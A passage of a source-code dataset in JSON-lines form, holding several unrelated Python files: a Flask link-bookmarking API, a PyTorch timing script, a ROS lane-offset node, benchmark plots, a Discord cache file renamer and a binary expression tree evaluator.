print(\"type(positive_score_list)\")\n # print(type(positive_score_list))\n # print(positive_score_list)\n\n positive_score_list.sort(reverse=True)\n negative_score_list.sort(reverse=True)\n\n two_scores_list = positive_score_list + negative_score_list\n # print(\"type(positive_score_list)\")\n # print(type(positive_score_list))\n # print(list(positive_score_list))\n # print(type(list(positive_score_list)))\n two_scores_list.sort(reverse=True)\n split_score = two_scores_list[np_sum - 1]\n posorneg = split_score[1]\n # print(\"np_sum\")\n # print(np_sum)\n # print(\"two_scores_list\")\n # print(two_scores_list)\n # print(\"split_score\")\n # print(split_score)\n # 求出positive-rate\n if posorneg == \"pos\":\n positive_num = positive_score_list.index(split_score)\n # print(\" positive_num\")\n # print( positive_num)\n else:\n positive_num = np_sum - negative_score_list.index(split_score)\n # print(\" positive_num\")\n # print( positive_num)\n positive_rate = positive_num / np_sum\n positive_rate_list.append(positive_rate)\n # print(\"positive_rate_list\")\n # print(positive_rate_list)\n # positive_scores_dict.update({str(line):{'positive_rate_list':positive_rate_list}})\n return positive_rate_list\n\n\ndef KNN_code(aa_line, _positive_line, _negative_line, avg2):\n pool = Pool(20)\n\n data_list = []\n X_list = []\n sample = len(_positive_line)\n for line in aa_line:\n line = line.strip()\n line = line[30 - int(avg2):30 + 7 + int(\n avg2)] # here 7 and the 7 in function \"get_rate\" should be changed if we change the matching length\n data_list.append(\n pool.apply_async(get_rate, args=(line, _positive_line, _negative_line[0:sample], avg2))) # [0:sample]\n\n for result in data_list:\n # print(result.get())\n X_list.append(result.get())\n pool.close()\n pool.join()\n return np.array(X_list)\n\n\ndef get_score_rate(_line, _positive_line):\n # print(len(_positive_line))\n if _line + \"\\n\" in _positive_line:\n _positive_line.remove(_line + \"\\n\")\n\n # print(len(_positive_line))\n positive_score_list = []\n for positive_line in _positive_line:\n positive_line = positive_line.strip()\n score = blosum62(_line, positive_line)\n positive_score_list.append(score)\n # 1.1 计算topk score\n positive_rate_list = []\n positive_score_sum = 0\n for i in range(30): # 改\n p = (i + 1) / 100 # 改\n np_sum = int(len(_positive_line) * p)\n # print(positive_score_list)\n\n # print(\"pos\")\n\n positive_score_list.sort(reverse=True)\n # print(positive_score_list)\n for i in range(np_sum):\n positive_score_sum += positive_score_list[i]\n positive_rate = positive_score_sum / np_sum\n positive_rate_list.append(positive_rate)\n # print(\"positive_rate_list\")\n # print(positive_rate_list)\n # positive_scores_dict.update({str(line):{'positive_rate_list':positive_rate_list}})\n return positive_rate_list\n\n\ndef KNN_positive_code(aa_line, _positive_line):\n pool = Pool(30)\n data_list = []\n X_list = []\n sample = len(_positive_line)\n for line in aa_line:\n line = line.strip()\n data_list.append(pool.apply_async(get_score_rate, args=(line, _positive_line)))\n\n for result in data_list:\n # print(result.get())\n X_list.append(result.get())\n return np.array(X_list)","sub_path":"KNNBinding.py","file_name":"KNNBinding.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181629434","text":"from flask import Blueprint, jsonify, request, Response\nfrom app.models.link import Category\nfrom app.models.link import Link, Alarm\nfrom 
app.models.members import Member\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlretrieve\nfrom app.views.utils import random_char, deEmojify\nimport subprocess\n\n\nbp = Blueprint('v1_link', __name__, url_prefix='/v1/link')\n\n\n@bp.route('/get/categories', methods=['GET'])\ndef getCategories():\n\n member = Member.getUserId(request.args[\"username\"])\n\n categories = Category.getCategories(member.id)\n\n return jsonify({\n \"categories\": Category.encodes(categories)\n })\n\n\n@bp.route(\"/create/category\", methods=[\"POST\"])\ndef createCategory():\n\n member = Member.getUserId(request.json[\"username\"])\n c_obj = {\n \"user_id\": member.id,\n \"color\": request.json[\"color\"],\n \"name\": request.json[\"name\"]\n }\n\n category = Category(c_obj)\n Category.save(category)\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/update/category\", methods=[\"POST\"])\ndef updateCategory():\n\n category = Category.update(int(request.json[\"id\"]), request.json[\n \"name\"], request.json[\"color\"])\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/delete/category\", methods=[\"POST\"])\ndef deleteCategory():\n\n category = Category.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"category\": Category.encode(category)\n })\n\n\n@bp.route(\"/delete/link\", methods=[\"POST\"])\ndef deleteLink():\n\n link = Link.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"link\": Link.encode(link)\n })\n\n\ndef parsingSite(url):\n domin = \"\"\n if url.startswith(\"http://\"):\n domain = url[7:].split(\"?\")[0].split(\"/\")[0]\n elif url.startswith(\"https://\"):\n domain = url[8:].split(\"?\")[0].split(\"/\")[0]\n else:\n url = \"http://\" + url\n domain = url[7:].split(\"?\")[0].split(\"/\")[0]\n\n response = requests.get(request.json[\"url\"])\n if response.ok:\n html = response.text\n html = html.replace(\"\\t\", \"\").replace(\"\\n\", \"\")\n\n soup = BeautifulSoup(html, \"html.parser\")\n\n try:\n title = soup.find(\"title\").get_text()\n except:\n title = domain\n\n try:\n html = deEmojify(html)\n innertext = soup.get_text()\n except:\n html = \"\"\n innertext = \"\"\n\n fav_filename = random_char(12) + \".jpg\"\n try:\n urlretrieve(\"https://www.google.com/s2/favicons?domain=\" +\n domain, \"/usr/src/images/\" + fav_filename)\n except:\n print(\"Here is local\")\n\n icon = \"https://lsapi.ggpark.kr/images/\" + fav_filename\n\n return html, innertext, title, icon, domain\n\n\n@bp.route(\"/update/link\", methods=[\"POST\"])\ndef updateLink():\n\n link = Link.get(request.json[\"id\"])\n\n if \"url\" in request.json and link.url != request.json[\"url\"]:\n url = request.json[\"url\"]\n\n html, innertext, title, icon, domain = parsingSite(url)\n request.json[\"html\"] = html\n request.json[\"innertext\"] = innertext\n request.json[\"title\"] = title\n request.json[\"icon\"] = icon\n request.json[\"domain\"] = domain\n request.json[\"pdf_url\"] = \"\"\n\n try:\n link = Link.update(request.json)\n except:\n request.json[\"html\"] = \"\"\n request.json[\"innertext\"] = \"\"\n link = Link.update(request.json)\n\n return jsonify({\n \"success\": True,\n \"link\": Link.encode(link)\n })\n\n\n@bp.route(\"/create/link\", methods=[\"POST\"])\ndef createLink():\n\n member = Member.getUserId(request.json[\"username\"])\n\n try:\n url = request.json[\"url\"]\n html, innertext, title, icon, domain = parsingSite(url)\n category_id = request.json[\"category_id\"]\n description = 
request.json[\"description\"]\n\n l_obj = {\n \"user_id\": member.id,\n \"url\": url,\n \"icon\": icon,\n \"title\": title,\n \"description\": description,\n \"html\": html,\n \"category_id\": category_id,\n \"domain\": domain,\n \"innertext\": innertext\n }\n\n try:\n link = Link(l_obj)\n Link.save(link)\n except:\n l_obj[\"html\"] = \"\"\n l_obj[\"innertext\"] = \"\"\n link = Link(l_obj)\n Link.save(link)\n\n return jsonify({\n \"success\": True,\n \"link\": Link.encode(link)\n })\n except:\n return jsonify({\n \"success\": False\n })\n\n\n@bp.route(\"/get/links\", methods=[\"GET\"])\ndef getLinks():\n\n member = Member.getUserId(request.args[\"username\"])\n\n links = Link.getLinks(request.args, member.id)\n\n return jsonify({\"links\": Link.encodes(links)})\n\n\n@bp.route(\"/get/link\")\ndef getLink():\n\n return jsonify({\"link\": Link.getOne(int(request.args[\"id\"]))})\n\n\n@bp.route(\"/set/pdf\")\ndef setPDF():\n link = Link.get(int(request.args[\"id\"]))\n\n if link.pdf_url and len(link.pdf_url) > 0:\n return jsonify({\"pdf_url\": link.pdf_url})\n else:\n subprocess.call(['xvfb-run', 'wkhtmltopdf', link.url, str(link.id) + '.pdf'],\n cwd=\"/usr/src/images/\")\n # subprocess.call(['wkhtmltopdf', link.url, str(link.id) + '.pdf'],\n # cwd=\"/Users/mediwhale/Downloads/100samples/\")\n\n pdf_url = \"https://lsapi.ggpark.kr/images/\" + str(link.id) + '.pdf'\n\n Link.update({\"id\": link.id, \"pdf_url\": pdf_url})\n\n return jsonify({\"pdf_url\": pdf_url})\n\n\n@bp.route(\"/update/alarm\", methods=[\"POST\"])\ndef updateAlarm():\n alarm_id = int(request.json[\"id\"])\n\n display_time = request.json[\"display_time\"]\n alarm_time = display_time[0:16]\n\n if alarm_id == -1:\n a_json = {\n \"link_id\": int(request.json[\"link_id\"]),\n \"display_time\": display_time,\n \"local_timezone\": int(request.json[\"local_timezone\"]),\n \"alarm_time\": alarm_time\n }\n\n alarm = Alarm(a_json)\n Alarm.save(alarm)\n\n else:\n alarm = Alarm.get(alarm_id)\n\n a_json = {\n \"link_id\": int(request.json[\"link_id\"]),\n \"display_time\": display_time,\n \"local_timezone\": int(request.json[\"local_timezone\"]),\n \"alarm_time\": alarm_time,\n \"deleted_at\": None\n }\n\n Alarm.update(alarm_id, a_json)\n\n return jsonify({\"success\": True})\n\n\n@bp.route(\"/delete/alarm\", methods=[\"POST\"])\ndef deleteAlarm():\n\n alarm = Alarm.delete(int(request.json[\"id\"]))\n\n return jsonify({\n \"success\": True\n })\n","sub_path":"LinkStorageAPI/app/views/v1/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"303230918","text":"import json\n\nimport torch\n\nfrom models.MobileNets import mobilenet_v2\nfrom models.resnet import resnet50\n\n\nfrom models.models import Resnet, ResnetDilated\n#\n# n1 = resnet50()\n# n11 = Resnet(n1)\n\nn2 = mobilenet_v2()\ndevice = \"cpu\"\nif torch.cuda.is_available():\n\tdevice = \"cuda\"\nprint(device)\nn2.to(device)\n# n22 = mnet(n2)\n#\n# data = torch.zeros(1, 3, 600, 454)\n#\n# o1 = n11(data)\n# o2 = n22(data)\n#\n# [print(_.size()) for _ in o1]\n# print(\"==============================================================\")\n# [print(_.size()) for _ in o2]\n#\n#\n# print(n2)\n\n# dummy_input = torch.zeros(1, 3, 224, 224)\n# torch.onnx.export(n2, dummy_input,\"export.onnx\", verbose=True, )\nbatch_sizes = [16, 32, 64, 128, 256]\n\nfor bs in batch_sizes:\n\tdummy = torch.randn(bs, 3, 224, 224).to(device)\n\n\t# warm up\n\timport time\n\tstart = 
time.time()\n\twarm_up_runs = 50\n\tfor i in range(warm_up_runs):\n\t\tout = n2(dummy)\n\tend = time.time()\n\tprint(\"%d duration %.4f \" % (bs, (end - start) / warm_up_runs))\n\n\n\tstart = time.time()\n\twarm_up_runs = 200\n\tfor i in range(warm_up_runs):\n\t\tout = n2(dummy)\n\tend = time.time()\n\tprint(\"%d duration %.4f \" % (bs, (end - start) / warm_up_runs))\n\tprint(\"======================================================================\")\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"349725102","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @Time:2020/10/7 19:59\n# @Author:JiahangGu\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass Solution:\n    def detectCycle(self, head: ListNode) -> ListNode:\n        \"\"\"\n        Since extra space is not allowed, consider a two-pointer solution. First analyze the problem: if a\n        cycle exists, the fast and slow pointers are certain to meet; if they never meet, there is no cycle.\n        When they meet, the difference in the number of steps taken, 2*x - x = x, is exactly the length of\n        the cycle (a simple pursuit problem). Knowing the cycle length, the entry can be found with two\n        pointers kept exactly one cycle length apart. As an optimization, the slow pointer has already taken\n        exactly x steps, so slow is x nodes away from head; it is enough to reset fast to head and advance\n        both pointers one step at a time until they meet again, which happens at the cycle entry.\n        Take care with the no-cycle check in the implementation: if fast never moved, or moved but never\n        became equal to slow, there is no cycle.\n        :param head:\n        :return:\n        \"\"\"\n        fast = head\n        slow = head\n        step = 0\n        while fast and fast.next:\n            step += 1\n            fast = fast.next.next\n            slow = slow.next\n            if fast == slow:\n                break\n        if fast != slow or step == 0:\n            return None\n        fast = head\n        while fast != slow:\n            fast = fast.next\n            slow = slow.next\n        return fast\n","sub_path":"All Problems/142-linked-list-cycle-ii.py","file_name":"142-linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"117643213","text":"#Line Detection\n\n#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Int16MultiArray\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport time\n\ncarPositionPublisher = None\ntimestamp = time.time()\n\n\n\n\n#Distance from point (x_0,y_0) to a line by = -ax - c is given by:\n#https://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line#Line_defined_by_an_equation\n#NOTE: The values b and m in this implementation refer to the standard line representation y=m*x +b\nclass LineModel():\n\n    def __init__(self, point1, point2):\n\n        #We can now calculate the slope m from the points. From that we get a\n        self.m = (point1[1]-point2[1])/(point1[0]-point2[0])\n        self.a = -self.m\n\n        #We can now rearrange the formula to c= -ax -by and insert one of our points to calculate c.\n        self.c = -self.a*point1[0] -point1[1]\n        #NOTE: This b is not the same as in the formula! we ignore the b in the formula because it is 1. 
This b here is the offset of the function\n self.b = -self.c\n\n #Now we prepare the denominators of the formula's fraction for later use (it only depends on constants)\n self.denominatorPoints = pow(self.a,2)+1\n self.denominatorDist = math.sqrt(self.denominatorPoints)\n\n def dist(self, point):\n #Here we just apply the formula as found in the link above\n return abs(self.a*point[0] + point[1] + self.c)/self.denominatorDist\n\n def closestPoint(self, point):\n xVal = (point[0] - self.a*point[1] - self.a*self.c)/self.denominatorPoints\n yVal = (-self.a*point[0] + (self.a**2)*point[1] - self.c)/self.denominatorPoints\n return np.array([xVal, yVal])\n\n def funcValue(self, xValue):\n return (xValue*self.m +self.b)\n\n def antiFuncValue(self, yValue):\n return ((yValue - self.b)/self.m)\n\n def intersection(self, otherLine):\n xVal = (self.b-otherLine.b)/(otherLine.m-self.m)\n yVal = self.funcValue(xVal)\n return np.array([xVal, yVal])\n\ndef getOffset(img):\n midLine = img[-1]\n midWhites = np.argwhere(midLine)\n together = 0\n for i in range(0,len(midWhites)):\n if i>0 and midWhites[i][0]==midWhites[i-1][0]+1:\n together += 1\n if together>10:\n return (320 + 90 - midWhites[i - together//2][0])\n else:\n together = 0\n\n\n return None\n\ndef callback(data):\n global timestamp\n global carPositionPublisher\n\n time0 = time.time()\n bridge = CvBridge()\n try:\n cv_image = bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n height = 480\n width = 640\n trapezBreiteOben = 200\n distSideTop = (width - trapezBreiteOben)/2\n trapezBreiteUnten = 200\n distSideBottom = (width - trapezBreiteUnten)/2\n\n #OL , OR , UL , UR\n src = np.float32([[distSideTop,280],[width-distSideTop,280],[distSideBottom,480],[width-distSideBottom,480]])\n dst = np.float32([[0,0],[200,0],[0, 200],[200,200]])\n\n gray_img = cv2.cvtColor(cv_image, cv2.COLOR_BGR2GRAY)\n _, thresh = cv2.threshold(gray_img, 160, 255, cv2.THRESH_BINARY)\n\n offset = getOffset(thresh)\n print(\"offset: {}\".format(offset))\n carPositionPublisher.publish(str(offset))\n\ndef listener():\n global carPositionPublisher\n rospy.init_node(\"listener\", anonymous=True)\n\n carPositionPublisher = rospy.Publisher(\"Offset\", String, queue_size=10)\n rospy.Subscriber(\"/camera/color/image_raw\", Image, callback)\n rospy.spin()\n\nif __name__=='__main__':\n listener()\n","sub_path":"tasks_wise1819/ub09/line_detection3.py","file_name":"line_detection3.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406321708","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport scipy.stats as st\nimport glob\nimport re\n\nbenchmark_dir1 = \"10000000_nodes_500000000_edges/\"\n\nbenchmark_dir2 = \"500000_nodes_500000000_edges/\"\nbenchmark_dir3 = \"20000000_nodes_500000000_edges/\"\n\n\nbenchmark_dir = benchmark_dir1\nconfidence_value = 0.95\n\n# Returns point estimate, begin and end of confidence interval.\ndef confidenceInterval(data, prob_interval) :\n # Note: the probability of the confidence interval starting at k and -k -th data point\n # is 1 - 2 * binom(k, len(data), 0.5)\n\n p = np.ones(len(data)) / len(data)\n distro = st.rv_discrete(values = (data, p))\n point = distro.median()\n interval = distro.interval(prob_interval)\n return point, interval[0], interval[1]\n\n\ndef plot_mean_and_CI(x, mean, lb, ub, color_mean, color_shading, linewidth=1, label=None):\n # plot the shaded range of the 
confidence intervals\n plt.fill_between(x, ub, lb,\n color=color_shading, alpha=.5)\n # plot the mean on top\n plt.plot(x, mean, color_mean, linewidth=linewidth, label=label,marker='o')\n\ndef getComAvoidingSamples(filename):\n file = open(benchmark_dir + \"cc_avoiding/\"+ filename, 'r')\n samples = [float(x.split(\",\")[5]) for x in file.readlines() if x.startswith(\"/cluster\")]\n file.close()\n return samples\n\n\ndef getSamples(col_name, filename, n):\n try:\n if(col_name == \"Total compute\"):\n values_scatter = np.array(getSamples(\"Scatter\", filename, n))\n values_compute = np.array(getSamples(\"Compute\", filename, n))\n values_reduce = np.array(getSamples(\"Reduce\", filename, n))\n return values_scatter + values_compute + values_reduce\n\n df = pd.read_csv(filename)\n data = df.values\n \n column_names = np.array([x.replace(\" \", \"\") for x in df.columns.values])\n column_names = np.delete(column_names, np.argwhere(column_names == 'Countnodes'))\n col_id = np.where(column_names == col_name.replace(\" \", \"\"))[0][0]\n values = np.max((data[:,col_id]).reshape((-1,n)), axis=1)\n #print(values)\n return values\n except:\n print(\"failed for \" + filename)\n\ndef getMixedFilename(n, t):\n n_mpi = int(n/t)\n return \"n_\" + str(n_mpi) + \"_t_\" + str(t) + \".txt\"\n\ndef getMpiOnlyFilename(n):\n return \"mpi/mpi_\" + str(n) + \".log\"\n\n# setup plots\n\n\n\nfor benchmark_dir in [benchmark_dir1, benchmark_dir2, benchmark_dir3]:\n\tplt.rcParams.update({'font.size': 24})\n\tfig = plt.figure(figsize=(10, 10))\n\tlinewidth = 1\n\ttitles = [\"Total time\"]\n\n\t# plot mpi only\n\tplt.xlim(0,24)\n\tns = [1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,41,43,47]\n\tfor i, name in enumerate([\"Total compute\"]):\n\t data = np.array([confidenceInterval(getSamples(name, benchmark_dir + getMpiOnlyFilename(n), n), confidence_value) for n in ns])\n\t plot_mean_and_CI(ns, data[:,1], data[:,1], data[:,2], color_mean='#144ead', color_shading=\"#5790ed\", linewidth=linewidth, label=\"mpi only\")\n\t plt.title(titles[i])\n\t plt.xlabel(\"Number of cores\")\n\t plt.ylabel(\"Time [s]\")\n\n\t#GET OMP\n\tfile_omp = benchmark_dir + \"omp/omp_results.log\"\n\tdata = pd.read_csv(file_omp,sep=',').values\n\tu = []\n\tl = []\n\tto_plot = []\n\tprint(data[1:20,1])\n\t#ignore first\n\tfor i in range(0, 24): \n\t d,up,lw = confidenceInterval(data[i*20+1:i*20+21,2], 0.95)\n\t to_plot += [d]\n\t u += [up]\n\t l += [lw]\n\tplot_mean_and_CI([i for i in range(1,25)], to_plot, u, l,color_mean=\"red\", linewidth=linewidth, color_shading=\"#ff9372\", label=\"OMP\")\n\n\t# plot comm avoiding\n\tns = [i for i in range(1,25)]\n\tdata = np.array([confidenceInterval(getComAvoidingSamples('cc_'+ str(n) +'.txt'), confidence_value) for n in ns])\n\tplot_mean_and_CI(ns, data[:,0], data[:,1], data[:,2], color_mean='green', color_shading=\"#87D37C\", linewidth=linewidth, label=\"comm avoiding\")\n\n\n\tplt.xlabel(\"Number of cores\")\n\tplt.ylabel(\"Time [s]\")\n\tplt.ylim(bottom=0, top=45)\n\tplt.legend()\n\tfig.tight_layout()\n\n\tplt.savefig(benchmark_dir[0:5] + \"our_impl.eps\", format='eps', dpi=40)\n\tplt.figure()\n\n","sub_path":"report/plots/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"150005259","text":"import os\r\nfrom colorama import Fore, Back, Style\r\n\r\nprint(Fore.CYAN + \"Discord Cache Decrypter\")\r\nprint(Fore.WHITE + \"Coded by: Mert Kemal 
Atılgan\")\r\nprint(\"https://github.com/mertatilgan\\n\")\r\n\r\npath = input(\"Enter the location of Discord's Cache folder: \")\r\nfiles = os.listdir(path)\r\ni = 1\r\n\r\nfor file in files:\r\n os.rename(os.path.join(path, file), os.path.join(path, str(i)+'.png'))\r\n i = i+1\r\nprint(Fore.GREEN + \"[!] The operation is successful. Files in \"+path+\" location have been converted to .png format.\")\r\nprint(Style.RESET_ALL)\r\n","sub_path":"discord-cache-decryptor-english.py","file_name":"discord-cache-decryptor-english.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367391252","text":"\n\n#calss header\nclass _SCAVENGER():\n\tdef __init__(self,): \n\t\tself.name = \"SCAVENGER\"\n\t\tself.definitions = [u'a bird or animal that feeds on dead animals that it has not killed itself']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scavenger.py","file_name":"_scavenger.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"206702640","text":"#!python\nimport sys\nimport queue\nfrom collections import deque\nlower_string = \"abcdefghijklmnopqrstuvwxyz\"\n\n\nclass BinaryTreeNode(object):\n def __init__(self, data):\n \"\"\"\n Initialize the tree with user expression(algebraic expression)\n \n Args:\n data(str): string representation of math expression\n \"\"\"\n self.data = data\n self.right = None\n self.left = None\n # flag for operators to distinguish from operands\n self.operator = False\n \n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of this parse tree node.\"\"\"\n return 'ParseTreeNode({!r})'.format(self.data)\n\n def is_leaf(self) -> bool:\n \"\"\"Return True if this node is a leaf(that is operand).\"\"\"\n return self.left is None and self.right is None\n\n\nclass BinaryExpressionTree(object):\n def __init__(self, expression: str = None):\n \"\"\"\n Initialize the tree with user expression(math expression)\n \n Args:\n expression(str): string representation of algebraic expression\n \"\"\"\n self.root = None\n self.size = 0\n\n if expression is not None:\n self.insert(expression)\n\n def __repr__(self) -> str:\n \"\"\"Return a string representation of this binary search tree.\"\"\"\n return 'BinarySearchTree({} nodes)'.format(self.size)\n\n def is_empty(self) -> bool:\n \"\"\"Return True if this binary search tree is empty (has no nodes).\"\"\"\n return self.root is None\n\n def insert(self, expression: str):\n \"\"\"\n Insert the postfix expression into the tree using stack\n \"\"\"\n postfix_exp = self.infix_to_postfix(expression)\n # if max size is 0, then it is infinite\n stack = deque()\n char = postfix_exp[0]\n # create a node for the first element of the expression\n node = BinaryTreeNode(char)\n # push it to stack\n stack.appendleft(node)\n\n # iterator for expression\n i = 1\n while len(stack) != 0:\n char = postfix_exp[i]\n # if char is float or int\n if '.' 
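The renaming loop in the cache snippet above keeps a manually incremented counter; an equivalent sketch using enumerate, with the folder path left as a placeholder (the sorted listing order is an added assumption, not taken from the original):

import os

def rename_sequential(folder, ext=".png"):
    # Rename every file in `folder` to 1.png, 2.png, ... as the snippet
    # above does. Note: os.rename raises on Windows if the target name
    # already exists, so this assumes no 1.png-style names are present.
    for i, name in enumerate(sorted(os.listdir(folder)), start=1):
        src = os.path.join(folder, name)
        if os.path.isfile(src):
            os.rename(src, os.path.join(folder, str(i) + ext))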
in char or char.isdigit():\n # create a node and push the node into the stack\n node = BinaryTreeNode(char)\n stack.appendleft(node)\n else:\n # create a parent(operator) node for operands\n operator_node = BinaryTreeNode(char)\n operator_node.operator = True\n # pop the last pushed item and create right_child\n right_child = stack.popleft()\n # pop item one before the last item and create left_child\n left_child = stack.popleft()\n # assign those as a child of the (parent)operator\n operator_node.right = right_child\n operator_node.left = left_child\n # push back the operator node(subtree) to the stack\n stack.appendleft(operator_node)\n # check if we reach last element in the expression\n # so we can define the root of the tree\n if len(stack) == 1 and i == len(postfix_exp) - 1:\n self.root = stack.popleft()\n # increment i\n i += 1\n self.size += 1\n print(f\"i is {i} in insert \")\n \n def items_in_order(self) -> list:\n \"\"\"Return an in-order list of all items in this binary search tree.\"\"\"\n items = []\n if not self.is_empty():\n # Traverse tree in-order from root, appending each node's item\n # item.append is uncalled function\n self._traverse_in_order_recursive(self.root, items.append)\n\n # self._traverse_in_order_iterative(self.root, items.append)\n # Return in-order list of all items in tree\n return items\n\n def _traverse_in_order_recursive(self, node, visit):\n \"\"\"\n Traverse this binary tree with recursive in-order traversal (DFS).\n Start at the given node and visit each node with the given function.\n Running time: O(n) we are visiting each node\n Memory usage: O(n) when node is visited we are adding new item to list\n \"\"\"\n\n if(node):\n # Traverse left subtree, if it exists\n self._traverse_in_order_recursive(node.left, visit)\n # Visit this node's data with given function\n visit(node.data)\n # Traverse right subtree, if it exists\n self._traverse_in_order_recursive(node.right, visit)\n\n def evaluate(self, node=None) -> float:\n \"\"\"\n Calculate this tree expression recursively\n\n Args:\n node(BinaryTreeNode): starts at the root node\n \"\"\"\n # initialize\n \n if node is None:\n node = self.root\n \n # empty tree\n if node is None:\n return 0\n\n # check if we are at the leaf, it means it is a operand\n if node.is_leaf():\n val = float(node.data)\n \n return val\n \n left_value = self.evaluate(node.left)\n right_value = self.evaluate(node.right)\n\n # addition\n if node.data == \"+\":\n \n return left_value + right_value\n # subtraction\n elif node.data == \"-\":\n return left_value - right_value\n # division\n elif node.data == \"/\":\n return left_value / right_value\n # multiplication\n elif node.data == \"*\":\n return left_value * right_value\n # power\n else:\n return left_value ** right_value\n\n def infix_to_postfix(self, infix_input: list) -> list:\n \"\"\"\n Converts infix expression to postfix.\n\n Args:\n infix_input(list): infix expression user entered\n \"\"\"\n\n # precedence order and associativity helps to determine which\n # expression is needs to be calculated first\n precedence_order = {'+': 0, '-': 0, '*': 1, '/': 1, '^': 2}\n associativity = {'+': \"LR\", '-': \"LR\", '*': \"LR\", '/': \"LR\", '^': \"RL\"}\n # clean the infix expression\n clean_infix = self._clean_input(infix_input)\n \n i = 0\n postfix = []\n operators = \"+-/*^\"\n stack = deque()\n while i < len(clean_infix):\n \n char = clean_infix[i]\n # print(f\"char: {char}\")\n # check if char is operator\n if char in operators:\n # check if the stack is empty or the top 
element is '('\n if len(stack) == 0 or stack[0] == '(':\n # just push the operator into stack\n stack.appendleft(char)\n i += 1\n # otherwise compare the curr char with top of the element\n else:\n # peek the top element\n top_element = stack[0]\n # check for precedence\n # if they have equal precedence\n if precedence_order[char] == precedence_order[top_element]:\n # check for associativity\n if associativity[char] == \"LR\":\n # pop the top of the stack and add to the postfix\n popped_element = stack.popleft()\n postfix.append(popped_element)\n # if associativity of char is Right to left\n elif associativity[char] == \"RL\":\n # push the new operator to the stack\n stack.appendleft(char)\n i += 1\n elif precedence_order[char] > precedence_order[top_element]:\n # push the char into stack\n stack.appendleft(char)\n i += 1\n elif precedence_order[char] < precedence_order[top_element]:\n # pop the top element\n popped_element = stack.popleft()\n postfix.append(popped_element)\n elif char == '(':\n # add it to the stack\n stack.appendleft(char)\n i += 1\n elif char == ')':\n top_element = stack[0]\n while top_element != '(':\n popped_element = stack.popleft()\n postfix.append(popped_element)\n # update the top element\n top_element = stack[0]\n # now we pop opening parenthases and discard it\n stack.popleft()\n i += 1\n # char is operand\n else:\n postfix.append(char)\n i += 1\n # print(postfix)\n # print(f\"stack: {stack}\")\n \n # empty the stack\n if len(stack) > 0:\n for i in range(len(stack)):\n postfix.append(stack.popleft())\n # while len(stack) > 0:\n # postfix.append(stack.popleft())\n\n return postfix\n \n def _clean_input(self, infix_exp: str) -> list:\n \"\"\"\n Clean and determine if the input expression user provided can be\n calculated.\n\n Args:\n infix_exp(str): raw infix expression from user\n \n Return:\n clean_format(list): cleaned expression in a list form. 
Using list\n helps to support more than 1 digit numbers in the tree.\n \"\"\"\n operators = \"+-*/^()\"\n # remove all whitespaces\n clean_exp = \"\".join(infix_exp.split())\n print(f\"clean_exp: {clean_exp}\")\n clean_format = []\n i = 0\n\n while i < len(clean_exp):\n char = clean_exp[i]\n print(f\"char: {char}\")\n if char in operators:\n clean_format.append(char)\n i += 1\n else:\n num = \"\"\n # if we see num, extract the full number not just 1 digit\n while char not in operators:\n char = clean_exp[i]\n num += char\n i += 1\n # just the number part\n clean_format.append(num[:-1])\n # operator\n clean_format.append(num[-1])\n return clean_format\n\n\nif __name__ == \"__main__\":\n # user_input = \"((2+5)+(7-3))*((9-1)/(4-2))\"\n # expr = \"(((10+2.2) + (5.4))^2) \"\n user_input = \"((2+5)/3)-(3+8)\"\n \n # ignore the script and grab the user expression\n # user_input = sys.argv[1:]\n tree_obj = BinaryExpressionTree(user_input)\n \n print(f\"Tree: {tree_obj}\")\n print(tree_obj.items_in_order())\n print(tree_obj.evaluate())\n \n \n #===============Test postfix conversion====================#\n # infix = \"((2+5)+(7-3))*((9-1)/(4-2))\"\n # # expected = \"kl+mn*-op^w*u/v/t*+q+\"\n # postfix = infix_to_postfix(expr)\n # print(f\"postfix: {postfix}\")\n\n # dirty = \"((10^2) + (300/20)) \"\n # clean = _clean_input(dirty)\n # print(f\"dirty: {dirty}, clean: 